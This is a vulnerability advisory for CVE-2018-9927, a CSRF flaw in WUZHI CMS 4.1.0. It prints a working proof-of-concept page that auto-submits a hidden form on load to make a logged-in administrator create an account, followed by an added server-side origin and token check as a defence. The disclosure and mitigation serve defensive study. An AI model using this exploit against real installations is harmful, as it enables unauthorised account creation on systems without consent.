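CVE Chinese Application Site

1. Vulnerability Summary

Vulnerability name: CSRF in WUZHI CMS 4.1.0 allows adding a user account
Report date: 2018-04-10
Discovered by: 套哥 (taoge@5ecurity.cn)
Product homepage: https://github.com/wuzhicms/wuzhicms
Software link: https://github.com/wuzhicms/wuzhicms
Version: 4.1.0
CVE ID: CVE-2018-9927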


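2. Vulnerability Overview

WUZHI CMS 4.1.0 contains a CSRF vulnerability: when an administrator who is logged in visits the CSRF test page below, an ordinary user account is added. WUZHI CMS is an open-source CMS hosted on GitHub, and the discoverer has reported the vulnerability to the author through the project's issues.

3. Exploit Code

The code of the CSRF test page is as follows: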

<html><body>
<script type="text/javascript">
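// Build a hidden form from the given fields and submit it as a POST to url.
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
// Assemble the fields of the "add member" form and send them.
function csrf_hack()
{
// Start from an empty string so the markup is not prefixed with "undefined".
var fields = "";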

fields += "<input type='hidden' name='info[username]' value='hack123' />";
fields += "<input type='hidden' name='info[password]' value='hacktest' />"; 
fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />"; 
fields += "<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />"; 
fields += "<input type='hidden' name='info[mobile]' value='' />"; 
fields += "<input type='hidden' name='modelids[]' value='10' />"; 
fields += "<input type='hidden' name='info[groupid]' value='3' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='avatar' value='' />"; 
fields += "<input type='hidden' name='islock' value='0' />";
fields += "<input type='hidden' name='sys_name' value='0' />";
fields += "<input type='hidden' name='info[birthday]' value='' />"; 
fields += "<input type='hidden' name='info[truename]' value='' />"; 
fields += "<input type='hidden' name='info[sex]' value='0' />";
fields += "<input type='hidden' name='info[marriage]' value='0' />";

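// Member-add action of the admin backend on the local test installation.
var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=提交";
post(url,fields);
}
// Submit automatically as soon as the page has loaded.
window.onload = function() { csrf_hack();}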
</script>
</body></html>
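
The test page works because the member-add request is accepted on the strength of the administrator's session cookie alone. The following is an added example, not code from WUZHI CMS or from the original advisory: a server-side gate that rejects such a request by checking its source origin and a per-session token. The function names, the csrf_token field, the session object and the sample requests are assumptions made for the illustration.

```javascript
// Added example: server-side CSRF gate. All names are hypothetical, not WUZHI CMS code.
const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);

// Return the scheme://host[:port] origin of a header value, or null if unusable.
function originOf(value) {
  try {
    const o = new URL(value).origin;
    return o === "null" ? null : o; // opaque origins (file:, sandboxed frames)
  } catch (e) {
    return null; // missing header or the literal string "null"
  }
}

// Compare two strings without stopping at the first differing character.
function constantTimeEqual(a, b) {
  if (typeof a !== "string" || typeof b !== "string" || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Decide whether a state-changing request may proceed.
function checkRequest(req, session, siteOrigin) {
  if (SAFE_METHODS.has(req.method)) return { allowed: true, reason: "safe-method" };
  // Prefer Origin when the browser sent it; fall back to Referer only if it is absent.
  const header = req.headers.origin !== undefined ? req.headers.origin : req.headers.referer;
  if (originOf(header) !== siteOrigin) return { allowed: false, reason: "cross-origin" };
  if (!constantTimeEqual(req.body.csrf_token, session.csrfToken)) {
    return { allowed: false, reason: "bad-token" };
  }
  return { allowed: true, reason: "ok" };
}

// Constructed sample data: the forged request mirrors what the test page above sends.
const SITE = "http://127.0.0.1";
const session = { csrfToken: "constructed-token-7f3a9c" };
const forged = {
  method: "POST",
  headers: { origin: "http://other-site.example" },
  body: { "info[username]": "hack123", "info[groupid]": "3" },
};
const legitimate = {
  method: "POST",
  headers: { origin: SITE },
  body: { "info[username]": "alice", csrf_token: "constructed-token-7f3a9c" },
};

console.log(checkRequest(forged, session, SITE), checkRequest(legitimate, session, SITE));
```

The token must be generated by the server with a cryptographically secure random source, bound to the administrator's session, and embedded in the genuine add-member form so that a page on another origin cannot read or predict it.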


4. References

CVE Chinese Application Site: http://www.iwantacve.cn/index.php/archives/7/
CVE (official): http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9927
exploit-db: https://www.exploit-db.com/exploits/44440/
